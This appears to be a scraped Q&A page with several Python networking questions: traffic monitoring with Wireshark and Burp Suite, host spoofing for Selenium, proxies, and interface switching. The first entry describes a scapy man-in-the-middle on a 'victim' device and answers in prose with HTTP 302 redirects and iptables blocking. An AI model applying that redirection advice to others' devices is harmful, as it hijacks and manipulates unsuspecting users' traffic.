I have built a MITM with python and scapy.I want to make the "victim" device be redirected to a specific page each time it tried to access a website. Any suggestions on how to do it?
*Keep in mind that all the traffic from the device already passes through my machine before being routed.
You can directly answer HTTP requests to pages different to that specific webpage with HTTP redirections (e.g. HTTP 302). Moreover, you should only route packets going to the desired webpage and block the rest (you can do so with a firewall such as iptables).
Related
What would be a good way to monitor network requests made from a Python application , in the same way that the browser console does (usually in the "Network" tab)?
Ideally, this would display informations such as:
url requested
headers
payload (if any)
time the request was sent
time the response was received
response headers and payload
timeline
This is mostly for debugging purposes, as the actual requests I want to track are made by third-party imports. A rich console similar to Chrome or Safari network tabs would be the absolute dream obviously, but there might be some "functional equivalents" in command-line mode as well.
Update: using macOS with root access
Without details of the operating system you are using it on, and whether you have root access, it is difficult to give a definitive answer.
However, you should consider using Wireshark (https://www.wireshark.org), which gives you pretty good insights into exactly what traffic is going from your application to the Internet and vice versa.
I am fairly proficient in Python and have started exploring the requests library to formulate simple HTTP requests. I have also taken a look at Sessions objects that allow me to login to a website and -using the session key- continue to interact with the website through my account.
Here comes my problem: I am trying to build a simple API in Python to perform certain actions that I would be able to do via the website. However, I do not know how certain HTTP requests need to look like in order to implement them via the requests library.
In general, when I know how to perform a task via the website, how can I identify:
the type of HTTP request (GET or POST will suffice in my case)
the URL, i.e where the resource is located on the server
the body parameters that I need to specify for the request to be successful
This has nothing to do with python, but you can use a network proxy to examine your requests.
Download a network proxy like Burpsuite
Setup your browser to route all traffic through Burpsuite (default is localhost:8080)
Deactivate packet interception (in the Proxy tab)
Browse to your target website normally
Examine the request history in Burpsuite. You will find every information you need
I'm trying to test response time of webpages hosted on many backends. These hosts are behind load balancer and above that I have my domain.com.
I want to use python+selenium on these backends but with spoofed hostname, without messing with /etc/hosts or running fake DNS servers. Is that possible with pure selenium drivers?
To illustrate problem better, here is what's possible in curl and I'd like to do the same with python+selenium:
If you're on a UNIX system, you can try something as explained here:
https://unix.stackexchange.com/questions/10438/can-i-create-a-user-specific-hosts-file-to-complement-etc-hosts
Basically you still use a hosts file, but it's only for you, located in ~/.hosts, setting the HOSTALIASESenvironment variable.
In short, no.
Selenium drives browsers using the WebDriver standard, which is by definition limited to interactions with page content. Even though you can provide Selenium with configuration options for the browser, no browser provides control over Host headers or DNS resolution outside of a proxy.
But even if you could initiate a request for a particular IP address with a custom Host header, subsequent requests triggered by the content (redirection; downloading of page assets; AJAX calls; etc) would still be outside of your control and are prohibited from customizing the Host header, leading the browser to fall back to standard DNS resolution.
Your only options are modifying the local DNS resolution (via /etc/hosts) or providing an alternative (via a proxy).
I'm thinking of writing an application that when running keeps track of all the websites I visit and connections I make.
Basically like a browser history, but I want to do it in a way that utilizes network concepts.
I only have a rudimentary understanding of Http, but would I be able to listen in on Http get requests from the browser and automatically pull information whenever a request is made? If anyone can give me a suggestion or outline of how this can be done, so I can research on implementing it, it would be very helpful! I'm thinking of implementing it in python, and my operating system is Ubuntu
Thank you very much.
You could do that by implementing a proxy.
In your case, basically, an agent that sits between your browser and internet. The proxy receive the request from the client, then, send it to the remote server, the remote server may reply to you and you'll have to send the server response back to the client.
To retrieve the informations you are wanting, reading the Http rfc will be helpful.
I am using code from https://github.com/inaz2/proxy2 .However I want the proxy server to be able to use 2 network interfaces and switch between the 2 depending on the page body. eg. If the page body has content like "Access Denied" (my college has blocked a ton of sites) I want it to use another network interface (eg mobile phone usb tethered) . Is it possible to edit the response_handler function of the code to do this ?
It's not proxy's matter. I recommend configuring the routing table.